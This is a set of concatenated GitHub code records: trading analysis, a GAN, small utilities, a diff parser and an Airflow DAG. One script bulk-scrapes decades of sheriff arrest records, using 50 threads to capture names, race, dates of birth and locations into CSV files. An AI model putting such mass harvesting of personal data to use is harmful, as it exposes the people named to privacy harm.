self.hundred_days['std dev'] = np.std(hundred['close'])\n self.hundred_days['long term ma'] = self.recent_ma_hist(days=100)['200']\n self.hundred_days['med term ma'] = self.recent_ma_hist(days=100)['50']\n self.hundred_days['short term ma'] = self.recent_ma_hist(days=100)['MA']\n \n return 
self\n","repo_name":"ralphjstuder/btc_trading","sub_path":"Asset Analysis/tech_analysis.py","file_name":"tech_analysis.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26364292229","text":"'''\r\nScript Name: pcso.py\r\nVersion: 1\r\nRevised Date: 03/23/2017\r\nPython Version: 3\r\nDescription: Downloads all the arrests from 1990-2017 from Polk County Sheriffs Office\r\nCopyright: 2017 Mike Felch \r\nURL: http://www.forensicpy.com/\r\n--\r\n- ChangeLog -\r\nv1 - [03-23-2017]: Original code\r\n'''\r\n\r\nfrom core.booking_entry import BookingEntry\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import date, timedelta as td, datetime\r\nfrom threading import Thread\r\nimport requests, re, queue\r\n\r\nSEARCH_URL = 'http://www.polksheriff.org/inq/Pages/Jail.aspx'\r\nBOOKING_URL = 'http://www.polksheriff.org/inq/pages/inmate.aspx?BookingNumber='\r\nTHEAD_COUNT = 50\r\n\r\ndef main():\r\n date_queue = queue.Queue()\r\n\r\n start = datetime.now()\r\n print(\"[!] Started processing at: {}\".format(start))\r\n\r\n view_state = refresh_viewstate()\r\n dates = get_dates('1990-01-01', '2017-01-03')\r\n\r\n for arrest_date in dates:\r\n date_queue.put(arrest_date)\r\n\r\n for thread_id in range(THEAD_COUNT):\r\n worker = Thread(target=process_arrests, args=(thread_id, view_state, date_queue,))\r\n worker.setDaemon(True)\r\n worker.start()\r\n\r\n print('- Waiting on workers to complete...')\r\n date_queue.join()\r\n\r\n end = datetime.now()\r\n print(\"[!] 
Ended processing at: {}\".format(end))\r\n\r\ndef process_arrests(thread_id, view_state, dates):\r\n while True:\r\n arrest_date = dates.get()\r\n\r\n print('- Thread #{}: Capturing arrests for: {}'.format(thread_id, arrest_date))\r\n arrests = capture_arrests(view_state, arrest_date.month, arrest_date.day, arrest_date.year)\r\n\r\n if arrests is None:\r\n print('- Adding arrest date back into queue: {}'.format(arrest_date))\r\n dates.put(arrest_date)\r\n else:\r\n save_arrests(arrests,arrest_date)\r\n dates.task_done()\r\n\r\ndef save_arrests(arrests, arrest_date):\r\n save_file = 'data/arrests_{}-{}-{}.csv'.format(arrest_date.year, arrest_date.month, arrest_date.day)\r\n with open(save_file,'w') as fh:\r\n header = [\r\n 'number', 'last_name', 'middle_name', 'first_name', 'race', 'sex',\r\n 'dob', 'booking_date', 'release_date', 'location'\r\n ]\r\n\r\n fh.write(','.join(header)+'\\n')\r\n for arrest in arrests:\r\n line = '{}\\n'.format(arrest)\r\n fh.write(line)\r\n\r\ndef get_dates(start_date, end_date):\r\n dates = []\r\n\r\n start = [int(x) for x in start_date.split('-')]\r\n end = [int(x) for x in end_date.split('-')]\r\n\r\n d1 = date(start[0], start[1], start[2])\r\n d2 = date(end[0], end[1], end[2])\r\n\r\n for i in range((d2-d1).days + 1):\r\n dates.append(d1 + td(days=i))\r\n\r\n return dates\r\n\r\ndef refresh_viewstate():\r\n parms = {}\r\n response = requests.get(SEARCH_URL)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n search_form = soup.find('form',id='aspnetForm')\r\n inputs = search_form.findAll('input')\r\n\r\n required_fields = ['__VIEWSTATE','__VIEWSTATEGENERATOR','__EVENTVALIDATION']\r\n for input in inputs:\r\n if input.get('id') in required_fields:\r\n parms[input.get('id')] = input.get('value')\r\n\r\n return parms\r\n\r\ndef capture_arrests(parms, month, day, year):\r\n arrests = []\r\n\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingMonth'] = str(month)\r\n 
parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingDay'] = str(day)\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$ddlBookingYear'] = str(year)\r\n parms['ctl00$ctl15$g_413cdd9d_e152_40ad_9a7a_a595a01d2d51$ctl00$btnBookingDateSearch'] = 'Search'\r\n\r\n try:\r\n search = requests.post(SEARCH_URL, data=parms)\r\n soup = BeautifulSoup(search.content, 'html.parser')\r\n grid = soup.find('table', id=re.compile(\"_grdResults\"))\r\n\r\n for row in grid.findAll('tr'):\r\n cols = [x.text for x in row.findAll('td')]\r\n\r\n if len(cols) > 0:\r\n try:\r\n be = BookingEntry()\r\n be.booking_number = cols[0]\r\n\r\n name = cols[1]\r\n name_parts = [x.strip() for x in name.split(',')]\r\n mid_parts = name_parts[1].split(' ', 1)\r\n be.first_name = name_parts[0]\r\n be.middle_name = mid_parts[1] if len(mid_parts) > 1 else ''\r\n be.last_name = mid_parts[0]\r\n\r\n race_sex = cols[2]\r\n be.race = race_sex[:len(race_sex) // 2]\r\n be.sex = race_sex[len(race_sex) // 2:]\r\n\r\n be.dob = cols[3]\r\n be.booking_date = cols[4]\r\n be.release_date = cols[5]\r\n be.location = cols[6]\r\n\r\n arrests.append(be)\r\n except Exception as ex:\r\n pass\r\n except Exception as ex:\r\n return None\r\n\r\n return arrests\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"ustayready/polk-sheriff-arrests","sub_path":"pcso.py","file_name":"pcso.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"1997311827","text":"import random\nimport itertools\n\n\n# start with 21 numbers\nnumbers = list(range(1, 22))\n# randomize the numbers\nrandom.shuffle(numbers)\nfor i in range(3):\n # split number into three groups of seven\n groups = [[numbers[i + j] for i in range(0, 21, 3)] for j in range(3)]\n print(f'group1: {groups[0]}\\ngroup2: {groups[1]}\\ngroup3: {groups[2]}')\n while True:\n input_text = input('think of a number and select the group 
(number only: 1, 2, 3): ')\n if input_text not in ['1', '2', '3']:\n print('you need to pick 1, 2, or 3')\n continue\n else:\n selected_group = int(input_text)\n break\n print('\\n')\n # put selected group in th middle\n groups[1], groups[selected_group - 1] = groups[selected_group - 1], groups[1]\n # flatten the list and keep going\n numbers = list(itertools.chain(*groups))\nprint(f'you are thinking of {numbers[10]}')\n","repo_name":"mchant/twenty_one_number_magic","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13505559529","text":"import math\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom PIL import Image\n\nfrom utility import (\n calc_FID,\n from_torch,\n to_torch,\n get_invert_permutation,\n)\n\ncuda = torch.cuda.is_available()\nrng = np.random.default_rng()\n\n\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find(\"Conv\") != -1 or classname.find(\"Linear\") != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find(\"BatchNorm\") != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n\n\nclass Reshape(nn.Module):\n def __init__(self, *shape):\n super().__init__()\n\n self.shape = shape\n\n def forward(self, x):\n return x.reshape(x.shape[0], *self.shape)\n\n\nclass Generator(nn.Module):\n def __init__(self, length, use_time_invariant_term):\n super(Generator, self).__init__()\n self.use_time_invariant_term = use_time_invariant_term\n self.length = length\n latent_size = 100\n nc = 1\n nz = 100\n ngf = 64\n\n # https://kikaben.com/dcgan-mnist/\n self.decoder = nn.Sequential(\n Reshape(nz, 1, 1),\n nn.ConvTranspose2d(nz, ngf * 2, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. 
(ngf*2) x 4 x 4\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 8 x 8\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n )\n\n z1_size = length * latent_size\n z2_size = length * latent_size\n\n self.seq1 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(z1_size, z1_size),\n nn.LeakyReLU(0.01),\n nn.Linear(z1_size, z1_size),\n nn.Unflatten(-1, (length, latent_size)),\n )\n\n self.seq2 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(z2_size, z2_size),\n nn.LeakyReLU(0.01),\n nn.Linear(z2_size, z2_size),\n nn.Unflatten(-1, (length, latent_size)),\n )\n\n self.linear_corr = nn.Linear(latent_size * 2, latent_size * 2)\n self.tanh = nn.Tanh()\n\n def forward(self, z1, z2):\n batch_size = z1.shape[0]\n latent_size = z1.shape[-1] // 2\n\n # joint_dense\n x1 = self.seq1(z1[:, :, :latent_size]) # length x 200 => length x 100\n x2 = self.seq2(z1[:, :, -latent_size:]) # length x 200 => length x 100\n corr = self.linear_corr(z2) # length x 200 => length x 200\n\n hidden = torch.cat((x1, x2), dim=-1) # => length x 200\n if self.use_time_invariant_term:\n hidden += corr # => length x 200\n\n # time distribute decode\n hidden = hidden.reshape(batch_size * self.length * 2, latent_size) # => 100\n hidden = self.decoder(hidden)\n hidden = hidden.reshape(\n batch_size, self.length, 2, 1, 16, 16\n ) # => length x 2 x 1 x 16 x 16\n return self.tanh(hidden)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, length):\n super(Discriminator, self).__init__()\n alpha = 0.01\n self.length = length\n self.size = length * 2 * 100\n self.activation = nn.ReLU()\n ndf = 64\n self.encoder = nn.Sequential(\n nn.Conv2d(1, ndf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 16 x 16\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. 
(ndf*2) x 8 x 8\n nn.Conv2d(ndf * 2, 1, 4, 2, bias=False),\n nn.Sigmoid(),\n )\n\n self.linear = nn.Linear(self.length * 2, 1)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n batch_size = x.shape[0]\n # time distribute encode\n x = x.reshape(batch_size * self.length * 2, 1, 16, 16) # => 1 x 16 x 16\n x = self.encoder(x) # => 100\n x = x.reshape(batch_size, self.length * 2) # => length x 2 x 100\n\n # joint_dense\n return self.sigmoid(self.linear(x))\n\n\ndef sample_x(batch_size, state_list, length):\n stream_size = state_list.shape[0]\n stream_length = state_list.shape[1]\n\n # stream_size個の動画からランダムにbatch_size個サンプリング\n stream_idxes = rng.choice(stream_size, batch_size)\n # stream_size x stream_length x 2 x 1 x w x h => batch_size x stream_length x 2 x 1 x w x h\n seq = state_list[stream_idxes, ...]\n\n # それぞれのサンプルについて、stream_length長の動画からランダムにlength長の区間を抽出\n begin_idx = rng.choice(stream_length - length - 1, batch_size)\n idx_span = np.array([np.arange(b, b + length) for b in begin_idx])\n # batch_size x stream_length x 2 x 1 x w x h => batch_size x length x 2 x 1 x w x h\n seq = np.stack([seq[i, idx_span[i], ...] 
for i in range(batch_size)], axis=0)\n return to_torch(seq)\n\n\ndef sample_z(batch_size, length):\n return torch.randn(batch_size, length, 200) # => length x 200\n\n\ndef save_gif(images, i, data_dir):\n # images: batch_size x length x 2 x 1 x w x h\n images = (images + 1) / 2 * 255\n size = images.shape[4]\n batch_size = images.shape[0]\n\n for b in range(batch_size):\n images1 = images[b, :, 0, 0, :, :]\n images2 = images[b, :, 1, 0, :, :]\n images_cat = np.concatenate((images1, images2), axis=2)\n images_flat = np.reshape(images_cat, (-1, size, size * 2))\n\n images_pil = []\n for image in images_flat:\n images_pil.append(Image.fromarray(image).convert(\"P\"))\n images_pil[0].save(\n data_dir / \"generate_image_{}_batch_{}.gif\".format(i, b),\n save_all=True,\n append_images=images_pil[1:],\n optimize=False,\n duration=40,\n loop=0,\n )\n\n\ndef fit_q(\n images1,\n images2,\n batch_size=20,\n n_step=20000,\n length=4,\n use_time_invariant_term=False,\n debug=False,\n data_dir=None,\n):\n if data_dir is None:\n raise TypeError(\"データディレクトリの指定が不正です\")\n mode = \"GAN\"\n # mode = \"f-GAN:KL\"\n G = Generator(length, use_time_invariant_term)\n D = Discriminator(length)\n G.apply(weights_init)\n D.apply(weights_init)\n adversarial_loss = nn.BCELoss()\n d_optimizer = optim.Adam(D.parameters(), lr=1e-4)\n g_optimizer = optim.Adam(G.parameters(), lr=1e-4)\n if debug:\n print(G)\n print(D)\n if cuda:\n G.cuda()\n D.cuda()\n\n real_label = torch.ones(batch_size, 1, requires_grad=False)\n fake_label = torch.zeros(batch_size, 1, requires_grad=False)\n # real_label = torch.ones(batch_size, 1, requires_grad=False) * 0.7\n # fake_label = torch.ones(batch_size, 1, requires_grad=False) * 0.3\n\n FID_all = []\n loss_all = []\n js_all = []\n d_loss_std_all = []\n grad_norm_all = []\n failure_check = []\n js_ema = None\n d_loss_ema = None\n f_star = lambda t: torch.exp(t - 1)\n state_list = torch.stack(\n [to_torch(images1), to_torch(images2)], dim=2\n ) # stream_size x 
stream_length x w x h => stream_size x stream_length x 2 x w x h\n state_list = torch.unsqueeze(\n state_list, 3\n ) # => stream_size x stream_length x 2 x 1 x w x h\n\n for i in range(n_step):\n # print(i, n_step)\n # ====================\n # Discriminatorの学習\n # ====================\n d_optimizer.zero_grad()\n\n # fake xの生成\n z1 = sample_z(batch_size, length) # => length x 200\n z2 = sample_z(batch_size, length) # => length x 200\n fake_x = G(z1, z2)\n # real xの生成\n real_x = sample_x(batch_size, state_list, length) # => length x 2 x 1 x w x h\n\n # リアルのサンプルとニセのサンプルを正しく見分けられるように学習\n D_fake = D(fake_x.detach())\n D_real = D(real_x)\n if mode == \"GAN\":\n fake_loss = adversarial_loss(D_fake, fake_label)\n real_loss = adversarial_loss(D_real, real_label)\n d_loss = real_loss + fake_loss\n elif mode == \"f-GAN:KL\":\n fake_loss = f_star(D_fake).mean()\n real_loss = -D_real.mean()\n d_loss = real_loss + fake_loss\n\n d_loss.backward()\n d_optimizer.step()\n\n # ====================\n # Generatorの学習\n # ====================\n g_optimizer.zero_grad()\n\n # fake xの生成\n z1 = sample_z(batch_size, length) # => length x 200\n z2 = sample_z(batch_size, length) # => length x 200\n fake_x = G(z1, z2)\n\n # real xの生成\n real_x = sample_x(batch_size, state_list, length) # => length x 2 x 1 x w x h\n if i % 100 == 0:\n torch.set_printoptions(precision=1, sci_mode=False, linewidth=200)\n print(real_x[0, 0, 0, 0, :, :])\n # print(real_x[0, 1, 0, 0, :, :])\n print(fake_x[0, 0, 0, 0, :, :].detach())\n # print(fake_x[0, 1, 0, 0, :, :].detach())\n torch.set_printoptions(profile=\"default\")\n\n # Discriminatorを騙すように学習\n D_fake = D(fake_x)\n D_real = D(real_x)\n if mode == \"GAN\":\n fake_loss = adversarial_loss(D_fake, real_label)\n real_loss = adversarial_loss(D_real, fake_label)\n # print(fake_loss)\n # print(real_loss)\n g_loss = fake_loss + real_loss\n elif mode == \"f-GAN:KL\":\n fake_loss = -f_star(D_fake).mean()\n real_loss = D_real.mean()\n g_loss = real_loss + fake_loss\n\n 
g_loss.backward()\n g_optimizer.step()\n\n if mode == \"GAN\":\n js = (-d_loss.item() + 2 * math.log(2)) / 2\n elif mode == \"f-GAN:KL\":\n js = -d_loss.item()\n\n # JSのEMA\n if js_ema is None:\n js_ema = js\n else:\n alpha = 0.001\n js_ema = alpha * js + (1 - alpha) * js_ema\n\n # Dlossの分散\n if d_loss_ema is None:\n d_loss_ema = d_loss.item()\n d_loss_std = 0\n else:\n alpha = 0.001\n d_loss_ema = alpha * d_loss.item() + (1 - alpha) * d_loss_ema\n d_loss_std = (\n alpha * (d_loss.item() - d_loss_ema) ** 2 + (1 - alpha) * d_loss_std\n )\n\n # 崩壊モードチェック\n g_score = D_fake.mean()\n d_score = 1 / 2 * D_real.mean() + 1 / 2 * (1 - D_fake.mean())\n\n if i % 100 == 0 and debug:\n print(\n \"[Count %d/%d] [JS: %f] [G loss: %f] [D loss: %f]\"\n % (i, n_step, js, g_loss.item(), d_loss.item())\n )\n\n if i % 100 == 0:\n failure_check.append((i, d_score.item(), g_score.item()))\n FID_all.append((i, calc_FID(from_torch(fake_x), from_torch(real_x))))\n js_all.append((i, js, js_ema))\n loss_all.append((i, d_loss.item(), g_loss.item()))\n d_loss_std_all.append((i, d_loss_std))\n\n # 勾配のノルム\n grad_norm = 0\n for d in D.parameters():\n param_norm = d.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n for g in G.parameters():\n param_norm = g.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n grad_norm = grad_norm ** (1.0 / 2)\n grad_norm_all.append((i, grad_norm))\n\n if i % 1000 == 0:\n save_gif(real_x.detach().numpy(), \"real_{}\".format(i), data_dir)\n save_gif(fake_x.detach().numpy(), \"fake_{}\".format(i), data_dir)\n\n return {\n \"G\": G,\n \"D\": D,\n \"batch_size\": batch_size,\n \"length\": length,\n \"failure_check\": pd.DataFrame(\n failure_check, columns=[\"i\", \"d_score\", \"g_score\"]\n ).set_index(\"i\"),\n \"FID_all\": pd.DataFrame(FID_all, columns=[\"i\", \"FID\"]).set_index(\"i\"),\n \"js_all\": pd.DataFrame(js_all, columns=[\"i\", \"js\", \"js_ema\"]).set_index(\"i\"),\n \"loss_all\": pd.DataFrame(loss_all, columns=[\"i\", \"d_loss\", 
\"g_loss\"]).set_index(\n \"i\"\n ),\n \"d_loss_std_all\": pd.DataFrame(\n d_loss_std_all, columns=[\"i\", \"d_loss_std_all\"]\n ).set_index(\"i\"),\n \"grad_norm_all\": pd.DataFrame(\n grad_norm_all, columns=[\"i\", \"grad_norm_all\"]\n ).set_index(\"i\"),\n \"js\": js_ema,\n }\n","repo_name":"ysasano/gaii","sub_path":"src/cnn/gaii_joint_cnn.py","file_name":"gaii_joint_cnn.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22558719733","text":"import json #--> module json\n\nchemin = \"/home/vagrant/fichier.json\"\n\n\"\"\"\n#Pour ecrire \nwith open(chemin, \"w\") as f: \n #json.dump(\"Bonjour\", f)\n #json.dump(list(range(10)), f) # --> avec une liste mais pas lisible\n json.dump(list(range(10)), f, indent=4) #--> plus lisible avec une indentation de 4\n\"\"\"\n\n#Pour lire\nwith open(chemin, \"r\") as f: \n liste = json.load(f)\n print(liste)\n print(type(liste))","repo_name":"thegodsson/PYTHON_UDEMY","sub_path":"fichier_json.py","file_name":"fichier_json.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40806705786","text":"import typer\nimport terrachicken.functions as functions\n\napp = typer.Typer()\n\n@app.command(\"repo\")\ndef delete(name: str = typer.Option(None, \"-n\")):\n if name == None:\n functions.listAllRepo()\n name = str(typer.prompt(\"Enter Repo Name to Delete: \"))\n else:\n pass\n org = functions.getUserName()\n full_name = f\"{org}/{name}\"\n typer.confirm(f\"Are you sure you want to delete {org}/{name}?\" , abort=True )\n functions.deleteRepo(full_name)\n\n@app.command(\"workspace\")\ndef delete(ws_name: str = \"\"):\n functions.listWorkspaces()\n ws_name = str.lower(input(\"Enter the name of Workspace(s): \")).split()\n ws_name_formatted = typer.style(f\"{ws_name}\", fg=typer.colors.RED)\n for name in ws_name:\n try:\n 
functions.deleteWorkspaces(name)\n except:\n typer.echo(f\"\\n {ws_name_formatted} not found in active Workspaces.\")\n finally:\n typer.echo(\"Remaining Workspaces:\")\n typer.echo(\"Exec-Mode | Workspace ID | Workspace Name\")\n functions.listWorkspaces()","repo_name":"Thaley17/TerraChicken","sub_path":"terrachicken/src/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73369016360","text":"with open('output.txt') as f:\n todo = f.read().split('\\n')\n\n\n\nwhile True:\n todo = []\n print('do you want to input anything :')\n print('Enter what you want to do here')\n to = input('')\n todo.append(to)\n print('we have added ')\n print(\"You need to do : \\n\")\n for i in todo:\n with open('output.txt', 'w') as f:\n for item in todo: #note: don't call your variable list as that is a python reserved keyword\n f.write(str(item)+'\\n')\n print(i, end = '\\n')\n print('\\ndo you want to add more y / n?')\n yn = input('')\n if yn == 'y':\n continue\n elif yn != 'n':\n print('I did not understand type again')\n print('do you want to add more y / n?')\n yn = input('')\n else:\n print('you need to :')\n print('')\n with open('output.txt', 'w') as f:\n for item in todo: \n f.write(str(item)+'\\n')\n print(i, end = ' \\u2713 \\n')\n break\n\nif len(todo) >= 1:\n print('have you done any of your tasks?')\n done = input('enter what task you have done: \\n')\n todo.remove(done)\n print('you need to do:')\n print('')\n with open('output.txt', 'w') as f:\n for item in todo: \n f.write(str(item)+' \\n')\n print(i, end = ' \\u2713 \\n')\nelse:\n print('That is not on your list')","repo_name":"henry-glitch/computer-science","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11462023094","text":"from util 
import *\nfrom commit_util import *\nfrom difflib import *\n\ndef get_chunk_size(chunks):\n if (len(chunks) == 0):\n return 0\n sz = 0\n chunks = chunks[1:]\n # find next chunks header\n while(len(chunks) > 0):\n if(chunks[0][:2] == \"@@\"):\n break\n sz = sz + 1\n chunks = chunks[1:]\n return sz\n\n\ndef parse_chunk_info(data):\n chunk_info = {}\n data = data.split(' ')\n assert(data[0] == data[3] == \"@@\")\n line_A = data[1].split(',')\n line_B = data[2].split(',')\n \n chunk_info[\"start_A\"] = int(line_A[0].replace('-', ''))\n chunk_info[\"offset_A\"] = int(line_A[1]) if (len(line_A) > 1) else -1\n chunk_info[\"start_B\"] = int(line_B[0].replace('+', ''))\n chunk_info[\"offset_B\"] = int(line_B[1]) if (len(line_B) > 1) else -1\n chunk_info[\"func_sig\"] = \" \".join(data[4:])\n \n return chunk_info\n\n\ndef get_diff_tag(ch):\n if ch == '+':\n return 'a'\n elif ch == '-':\n return 'd'\n else:\n return 'e'\n\n\n## Not needed yet.\ndef parse_chunk_body(chunks):\n lines = []\n tags = []\n for line in chunks:\n tag = get_diff_tag(line[0])\n tags.append(tag)\n lines.append(line[1:])\n \n return [lines, tags]\n\n\ndef parse_chunks(data):\n chunks_data = []\n while(len(data) > 0):\n sz = get_chunk_size(data)\n header = parse_chunk_info(data[0])\n # body = parse_chunk_body(chunks[1:sz+1])\n body = []\n chunks_data.append({\"header\":header, \"body\":body})\n data = data[sz+1:]\n \n return chunks_data\n\n\ndef parse_delta(delta):\n delta = delta.split('\\n')\n\n if (len(delta) < 4):\n ## binary files\n return None\n elif(delta[4][:2] == \"@@\"):\n targets_info, metadata = delta[0], delta[1]\n old_file, new_file = delta[2], delta[3]\n chunks_data = parse_chunks(delta[4:])\n else:\n ## Such as deleted files, num of header line can be different.\n targets_info, msg, metadata = delta[0], delta[1], delta[2]\n old_file, new_file = delta[3], delta[4] \n chunks_data = parse_chunks(delta[5:])\n \n return chunks_data\n\n\ndef build_index_A(A):\n dic_A, index_A = {}, []\n cnt = 
1\n for line in A:\n if line in dic_A:\n num = dic_A[line]\n index_A.append(str(num))\n else:\n dic_A[line] = str(cnt)\n index_A.append(str(cnt))\n cnt += 1\n\n return index_A, dic_A\n\n\ndef build_index_B(B, dic_A):\n index_B = []\n cnt = len(dic_A) + 1\n for line in B:\n if line in dic_A:\n num = dic_A[line]\n index_B.append(num)\n else:\n index_B.append(str(cnt))\n cnt += 1\n return index_B\n\n\ndef build_index(A, B):\n index_A, dic_A = build_index_A(A)\n index_B = build_index_B(B, dic_A)\n\n ## diff\n datas = list(unified_diff(index_A, index_B))[3:]\n # print_json(datas)\n\n # p1 = [\"1\", \"1\", \"1\"]\n # p1 = \"\".join(['[' + sub + ']' for sub in p1])\n \n # for i in range(0, len(index_A) - len(p1) + 1):\n # tmp_index, _ = build_index_A(index_A[i:])\n # tmp = \"\".join(['[' + sub + ']' for sub in tmp_index])\n # if(p1 in tmp):\n # print_json(A)\n # input()\n # break\n\n return index_A, index_B\n\n\n# comb = list(combinations(pat, 2))\n# v = []\n# for item in comb:\n# if item[0] == item[1]:\n# v.append(True)\n# else:\n# v.append(False)\n# print(v)\n\ndef valid(l):\n ## pat: \"ABA\"\n if not(l[0] != l[1]):\n return False\n if not(l[0] == l[2]):\n return False\n return True\n\nfrom itertools import combinations\n\ndef build_histogram(A, B):\n try:\n if(len(A) < 1 or len(B) < 1): return\n # A = \"l m n o x z y z x x y x z o z l x y\".split(\" \")\n # B = \"l m n o x y z y x z y l x y\".split(\" \")\n index_A, _ = build_index(A, B)\n\n # pat = \"12331\"\n # pat2 = \"132\"\n pat = \"121\"\n pat2 = \"212\"\n l = index_A\n for i in range(0, len(l) - len(pat) + 1):\n tmp_index, _ = build_index_A(l[i:])\n tmp_index = [ \"[\" + ch + \"]\" for ch in tmp_index]\n tmp_index = \"\".join(tmp_index)\n\n tmp_pat = [ \"[\" + ch + \"]\" for ch in pat]\n tmp_pat = \"\".join(tmp_pat)\n\n if tmp_pat in tmp_index:\n ## build d(symbolic pat -> concrete pat2)\n idx = tmp_index.find(tmp_pat)\n index = A[idx + i:]\n d = {}\n for j in range(0, len(pat)):\n if pat[j] not in d:\n 
d[pat[j]] = index[j]\n \n con = []\n for p in pat2:\n con.append(d[p])\n \n tmp_con = [ \"[\" + ch + \"]\" for ch in con]\n tmp_con = \"\".join(tmp_con)\n\n tmp_B = [ \"[\" + ch + \"]\" for ch in B]\n tmp_B = \"\".join(tmp_B)\n\n if tmp_con in tmp_B:\n print(\"[*] found!\")\n print_json(A)\n print_json(B)\n input()\n except:\n print(\"except\") \n # v = valid(tmp_index)\n # if v:\n # p1 = A[i]\n # p2 = A[i+1]\n # p3 = A[i+2]\n # assert p1 == p3\n # for j in range(0, len(B) - 3 + 1):\n # if (B[j] == B[j + 2] == p2) and (B[j + 1] == p1):\n # print_json(A)\n # print_json(B)\n # print(\"[*] found!\")\n # input()\n # i = len(l) - len(pat) + 1\n # break\n\n pass\n\n\ndef build_histogram2(A, B):\n index_A, _ = build_index(A, B)\n\n pat = \"ABA\"\n l = index_A\n for i in range(0, len(l) - len(pat) + 1):\n tmp_index, _ = build_index_A(l[i:])\n v = valid(tmp_index)\n if v:\n p1 = A[i]\n p2 = A[i+1]\n p3 = A[i+2]\n assert p1 == p3\n for j in range(0, len(B) - 3 + 1):\n if (B[j] == B[j + 2] == p2) and (B[j + 1] == p1):\n print_json(A)\n print_json(B)\n print(\"[*] found!\")\n input()\n i = len(l) - len(pat) + 1\n break\n\n pass\n\ndef pattern_mathcing(currComm: Commit, prevComm: Commit, repo: Repo):\n diffs = prevComm.diff(currComm)\n\n for diff in diffs:\n if diffType(diff) != 'M':\n continue\n\n pathA = diff.a_blob.path if diff.a_blob else None\n pathB = diff.b_blob.path if diff.b_blob else None\n \n if not pathA or not pathB:\n continue\n \n assert pathA == pathB\n\n path = pathA\n\n \n try:\n delta = repo.git.diff(prevComm, currComm, path)\n except:\n print(\"[-] repo.git.diff() Error!\")\n return\n \n chunks_data = parse_delta(delta)\n if not chunks_data:\n return\n file_data_A = repo.git.show('{}:{}'.format(prevComm.hexsha, path))\n file_data_B = repo.git.show('{}:{}'.format(currComm.hexsha, path))\n\n try:\n for chunk in chunks_data:\n start_A = chunk[\"header\"][\"start_A\"]\n offset_A = chunk[\"header\"][\"offset_A\"]\n start_B = chunk[\"header\"][\"start_B\"]\n 
offset_B = chunk[\"header\"][\"offset_B\"]\n\n data_A = file_data_A.split(\"\\n\")[start_A - 1 : start_A + offset_A - 1]\n data_B = file_data_B.split(\"\\n\")[start_B - 1 : start_B + offset_B - 1]\n\n build_histogram(data_A, data_B)\n \n except UnicodeEncodeError:\n print(\"[-] UnicodeEncodeError!\")\n\n pass\n\n\n# EOF\n","repo_name":"topcue/binary-gleaner","sub_path":"chunk.py","file_name":"chunk.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42383540911","text":"# -*- coding:utf-8 -*-\n\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.providers.snowflake.operators.snowflake import SnowflakeOperator\n\nfrom get_csv_files import make_teams_message_country_daily\nfrom get_csv_files import make_teams_message_country_longterm\n\ndefault_args = {\n 'owner': 'CHEQUER',\n 'depends_on_past': False,\n 'start_date': datetime(2020, 7, 16),\n}\n\ndag = DAG(\n dag_id='teams_webhook_country',\n default_args=default_args,\n catchup=False,\n schedule_interval='00,10 01 * * *')\n\n\ndef which_path(**kwargs):\n min = kwargs['execution_date'].minute\n # min=0\n if min == 0:\n d = 'upload'\n else:\n d = 'pass'\n return d\n\n\ndef check_tri_week(**kwargs):\n scheduled_date = kwargs['task_instance'].xcom_pull(task_ids='send_message_longterm', key='teams_long_term')\n date = str(kwargs['execution_date'])\n date = date[:10]\n print(\"예정된 날짜 : \", scheduled_date)\n date = datetime.strptime(date, '%Y-%m-%d')\n # date=scheduled_date\n if date == scheduled_date:\n d = 'yes'\n else:\n d = 'no'\n return d\n\n\ncountries = ['us', 'kr', 'br']\noptions = ['upload', 'pass']\nis_tri = 